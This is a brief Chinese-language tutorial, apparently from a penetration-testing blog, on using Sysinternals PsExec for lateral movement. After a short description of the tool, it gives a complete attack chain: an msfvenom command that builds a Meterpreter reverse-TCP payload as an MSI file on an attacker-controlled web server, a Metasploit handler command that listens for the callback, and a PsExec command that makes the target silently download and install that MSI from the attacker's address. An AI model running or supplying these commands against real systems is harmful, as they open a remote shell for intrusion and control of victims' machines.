1. 概述

PsExec是SysinternalsSuite的⼩⼯具之⼀,是⼀种轻量级的telnet替代品,允许在其他系统上执⾏进程,完成控制台应⽤程序的完全交互,⽽⽆需⼿动安装客户端软件,并且可以获得与控制台应⽤程序相当的完全交互性。

2. 利用

2.1 生成shellcode

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.5.134 lport=3333 -f msi  > /var/www/html/3333.msi

image.png

2.2 监听

  1. handler -H 192.168.5.134 -P 3333 -p windows/meterpreter/reverse_tcp

image.png

2.3 psexec执行payload

可以看到下面利用psexec来执行,真正执行的却是msiexec.exe

  1. PsExec.exe -s -d msiexec.exe /q /i http://192.168.5.134/3333.msi

image.png
image.png